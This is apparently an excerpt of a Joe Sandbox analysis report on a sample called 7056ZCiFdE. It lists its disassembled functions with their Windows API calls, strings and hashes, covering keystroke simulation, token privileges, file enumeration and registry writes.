                                    • Opcode ID: c8a4adbef2d52a288be933f57dd42e6fb4169d71a1c7654a51455ca3bd0af18b
                                    • Instruction ID: 8498361f28613d2b2ccb2dcd6252b56d847941138a58b183c210960adb8dd02c
                                    • Opcode Fuzzy Hash: c8a4adbef2d52a288be933f57dd42e6fb4169d71a1c7654a51455ca3bd0af18b
                                    • Instruction Fuzzy Hash: 2B939071A04219DBDF24DF98D881BADB7B1FF58714F24826AE945EB381E7709E81CB40
                                    Function 008848D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 008848DF
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BD665
                                    • IsIconic.USER32(?), ref: 008BD66E
                                    • ShowWindow.USER32(?,00000009), ref: 008BD67B
                                    • SetForegroundWindow.USER32(?), ref: 008BD685
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BD69B
                                    • GetCurrentThreadId.KERNEL32 ref: 008BD6A2
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BD6AE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BD6BF
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BD6C7
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BD6CF
                                    • SetForegroundWindow.USER32(?), ref: 008BD6D2
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD6E7
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD6F2
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD6FC
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD701
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD70A
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD70F
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BD719
                                    • keybd_event.USER32(00000012,00000000), ref: 008BD71E
                                    • SetForegroundWindow.USER32(?), ref: 008BD721
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 008BD748
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: f73d75e8af6dd8a56aa2ecbcb39d559b2fbd5f9bf6ec82a42858494d59763c2c
                                    • Instruction ID: 97aa48cf499516cbabbfc81694f3b28d4a46b1727ce33724761c73b43dfdeff4
                                    • Opcode Fuzzy Hash: f73d75e8af6dd8a56aa2ecbcb39d559b2fbd5f9bf6ec82a42858494d59763c2c
                                    • Instruction Fuzzy Hash: 44316071A9431CBEEB306B619C49FBF7F6CEB44B50F104025FA04EA1D1DAB15A01BBA1
                                    Function 008D8310 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D882B
                                      • Part of subcall function 008D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8858
                                      • Part of subcall function 008D87E1: GetLastError.KERNEL32 ref: 008D8865
                                    • _memset.LIBCMT ref: 008D8353
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D83A5
                                    • CloseHandle.KERNEL32(?), ref: 008D83B6
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D83CD
                                    • GetProcessWindowStation.USER32 ref: 008D83E6
                                    • SetProcessWindowStation.USER32(00000000), ref: 008D83F0
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D840A
                                      • Part of subcall function 008D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8309), ref: 008D81E0
                                      • Part of subcall function 008D81CB: CloseHandle.KERNEL32(?,?,008D8309), ref: 008D81F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 8030362ecd9bf28c57fd1cfec1fc76a6084a732c216c349f7cbef2489fdd23fe
                                    • Instruction ID: f2ed6043f29f22e0ddfbf62b42400734dec5896baba67b4e82ebe56a7b4bef7f
                                    • Opcode Fuzzy Hash: 8030362ecd9bf28c57fd1cfec1fc76a6084a732c216c349f7cbef2489fdd23fe
                                    • Instruction Fuzzy Hash: 81814BB1910209EFDF219FA8DC45AEEBBB9FF04304F14426AF914E6261DB319E15DB21
                                    Function 008EC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 008EC78D
                                    • FindClose.KERNEL32(00000000), ref: 008EC7E1
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EC806
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EC81D
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008EC844
                                    • __swprintf.LIBCMT ref: 008EC890
                                    • __swprintf.LIBCMT ref: 008EC8D3
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                    • __swprintf.LIBCMT ref: 008EC927
                                      • Part of subcall function 008A3698: __woutput_l.LIBCMT ref: 008A36F1
                                    • __swprintf.LIBCMT ref: 008EC975
                                      • Part of subcall function 008A3698: __flsbuf.LIBCMT ref: 008A3713
                                      • Part of subcall function 008A3698: __flsbuf.LIBCMT ref: 008A372B
                                    • __swprintf.LIBCMT ref: 008EC9C4
                                    • __swprintf.LIBCMT ref: 008ECA13
                                    • __swprintf.LIBCMT ref: 008ECA62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: 7f376d6f45239211f09b671e10727129d46b4ca49ba0a181e0679a2194779066
                                    • Instruction ID: fcd790db4838277b340ec6684ad28c41df5a5b510f843b55f77ffe0f7f5e69cd
                                    • Opcode Fuzzy Hash: 7f376d6f45239211f09b671e10727129d46b4ca49ba0a181e0679a2194779066
                                    • Instruction Fuzzy Hash: 63A109B2408345ABD750FBA8C886DAFB7ECFF95704F440929F595C6191EA30DA09CB63
                                    Function 008EEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EEFB6
                                    • _wcscmp.LIBCMT ref: 008EEFCB
                                    • _wcscmp.LIBCMT ref: 008EEFE2
                                    • GetFileAttributesW.KERNEL32(?), ref: 008EEFF4
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 008EF00E
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EF026
                                    • FindClose.KERNEL32(00000000), ref: 008EF031
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF04D
                                    • _wcscmp.LIBCMT ref: 008EF074
                                    • _wcscmp.LIBCMT ref: 008EF08B
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF09D
                                    • SetCurrentDirectoryW.KERNEL32(00938920), ref: 008EF0BB
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF0C5
                                    • FindClose.KERNEL32(00000000), ref: 008EF0D2
                                    • FindClose.KERNEL32(00000000), ref: 008EF0E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 1e11911a47d7c787e43b57f39fc63fc907969ebbc71842ada6ed35a94fc47456
                                    • Instruction ID: 0e6c6654b9ff3722485bf14010fc182287cc570abc76d71479e97000d058d4da
                                    • Opcode Fuzzy Hash: 1e11911a47d7c787e43b57f39fc63fc907969ebbc71842ada6ed35a94fc47456
                                    • Instruction Fuzzy Hash: 8731C1325056486FDB24ABA9DC58AEE77ACFF4A360F1001B5F914D2092DB70DB44DF61
                                    Function 00900857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900953
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 009009C1
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900A09
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900A92
                                    • RegCloseKey.ADVAPI32(?), ref: 00900DB2
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00900DBF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 85940f605a141d4d17c0ff02f75f33435971def5bf3fdab82f43b8813172bd10
                                    • Instruction ID: 6b6fa6dd0ef667787f2380458bf1e89bf39521fb1580986be1a8ab52c12e5680
                                    • Opcode Fuzzy Hash: 85940f605a141d4d17c0ff02f75f33435971def5bf3fdab82f43b8813172bd10
                                    • Instruction Fuzzy Hash: 5A023A756006129FDB14EF18C851E2AB7E5FF89314F048568F89ADB7A2DB30ED41CB82
                                    Function 0090C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • DragQueryPoint.SHELL32(?,?), ref: 0090C627
                                      • Part of subcall function 0090AB37: ClientToScreen.USER32(?,?), ref: 0090AB60
                                      • Part of subcall function 0090AB37: GetWindowRect.USER32(?,?), ref: 0090ABD6
                                      • Part of subcall function 0090AB37: PtInRect.USER32(?,?,0090C014), ref: 0090ABE6
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C690
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C69B
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C6BE
                                    • _wcscat.LIBCMT ref: 0090C6EE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C705
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C71E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0090C735
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0090C757
                                    • DragFinish.SHELL32(?), ref: 0090C75E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0090C851
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: 2c6224737f7a6502922d6b14a2107d838c97cd19a5e3290fd473298abcd1aaae
                                    • Instruction ID: a3ca32a1fe249b0faa4623b436ff612c4e45bc00d1c490c1b540d8c6cdde179a
                                    • Opcode Fuzzy Hash: 2c6224737f7a6502922d6b14a2107d838c97cd19a5e3290fd473298abcd1aaae
                                    • Instruction Fuzzy Hash: 64616A72108301AFC711EF64DC85EAFBBE8FF89714F400A2EF595921A1DB719A49CB52
                                    Function 008EF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF113
                                    • _wcscmp.LIBCMT ref: 008EF128
                                    • _wcscmp.LIBCMT ref: 008EF13F
                                      • Part of subcall function 008E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E43A0
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 008EF16E
                                    • FindClose.KERNEL32(00000000), ref: 008EF179
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF195
                                    • _wcscmp.LIBCMT ref: 008EF1BC
                                    • _wcscmp.LIBCMT ref: 008EF1D3
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF1E5
                                    • SetCurrentDirectoryW.KERNEL32(00938920), ref: 008EF203
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF20D
                                    • FindClose.KERNEL32(00000000), ref: 008EF21A
                                    • FindClose.KERNEL32(00000000), ref: 008EF22C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 8685a6ad38df29fd3d1b99963147a33505728d5bf80de1f156eae89f6f279a2e
                                    • Instruction ID: 1716d58f2c217f3b6cfb3407314d938c9e79bbb9e8a30c0c329c64b5fd2b8f36
                                    • Opcode Fuzzy Hash: 8685a6ad38df29fd3d1b99963147a33505728d5bf80de1f156eae89f6f279a2e
                                    • Instruction Fuzzy Hash: 9B31E43650025DAEDB20AB69EC58AEE77ACFF86364F100171FA14E2091DB30DB45CB54
                                    Function 008EA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA20F
                                    • __swprintf.LIBCMT ref: 008EA231
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA26E
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA293
                                    • _memset.LIBCMT ref: 008EA2B2
                                    • _wcsncpy.LIBCMT ref: 008EA2EE
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA323
                                    • CloseHandle.KERNEL32(00000000), ref: 008EA32E
                                    • RemoveDirectoryW.KERNEL32(?), ref: 008EA337
                                    • CloseHandle.KERNEL32(00000000), ref: 008EA341
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: dbc3d31dfe4ffe43646c865069569373beb70e7402c139bcc1d9ee2c600bf1dd
                                    • Instruction ID: 1689be7c5bc2122f60a1e9ff4c5822792bf4989f3969d74745fb6687119a02f7
                                    • Opcode Fuzzy Hash: dbc3d31dfe4ffe43646c865069569373beb70e7402c139bcc1d9ee2c600bf1dd
                                    • Instruction Fuzzy Hash: B0319F71504249ABDB20DFA5DC49FEB37BCFF89B41F1040B6F609D2560E670A7448B25
                                    Function 0090C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C1FC
                                    • GetFocus.USER32 ref: 0090C20C
                                    • GetDlgCtrlID.USER32(00000000), ref: 0090C217
                                    • _memset.LIBCMT ref: 0090C342
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C36D
                                    • GetMenuItemCount.USER32(?), ref: 0090C38D
                                    • GetMenuItemID.USER32(?,00000000), ref: 0090C3A0
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C3D4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C41C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C454
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0090C489
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 204fad49d93d3167c6f46f87b693b7f450169c0e4fee28b1129876a05e328901
                                    • Instruction ID: 1b46974b52430e2995105b23c6b48701f31785fccdfe13df8fc2bad9f897325d
                                    • Opcode Fuzzy Hash: 204fad49d93d3167c6f46f87b693b7f450169c0e4fee28b1129876a05e328901
                                    • Instruction Fuzzy Hash: 38817DB16183019FD720DF58C894A7BBBE9FB88714F004A2EF995D72A1D730D905DB92
                                    Function 008D7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D821E
                                      • Part of subcall function 008D8202: GetLastError.KERNEL32(?,008D7CE2,?,?,?), ref: 008D8228
                                      • Part of subcall function 008D8202: GetProcessHeap.KERNEL32(00000008,?,?,008D7CE2,?,?,?), ref: 008D8237
                                      • Part of subcall function 008D8202: RtlAllocateHeap.NTDLL(00000000,?,008D7CE2), ref: 008D823E
                                      • Part of subcall function 008D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D8255
                                      • Part of subcall function 008D829F: GetProcessHeap.KERNEL32(00000008,008D7CF8,00000000,00000000,?,008D7CF8,?), ref: 008D82AB
                                      • Part of subcall function 008D829F: RtlAllocateHeap.NTDLL(00000000,?,008D7CF8), ref: 008D82B2
                                      • Part of subcall function 008D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D7CF8,?), ref: 008D82C3
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D7D13
                                    • _memset.LIBCMT ref: 008D7D28
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D7D47
                                    • GetLengthSid.ADVAPI32(?), ref: 008D7D58
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 008D7D95
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D7DB1
                                    • GetLengthSid.ADVAPI32(?), ref: 008D7DCE
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D7DDD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D7DE4
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D7E05
                                    • CopySid.ADVAPI32(00000000), ref: 008D7E0C
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D7E3D
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D7E63
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D7E77
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                    • Instruction ID: d21695e271db3f003a5832fad5b16cb9da465d5f8655881c5621ea4eac4499c1
                                    • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
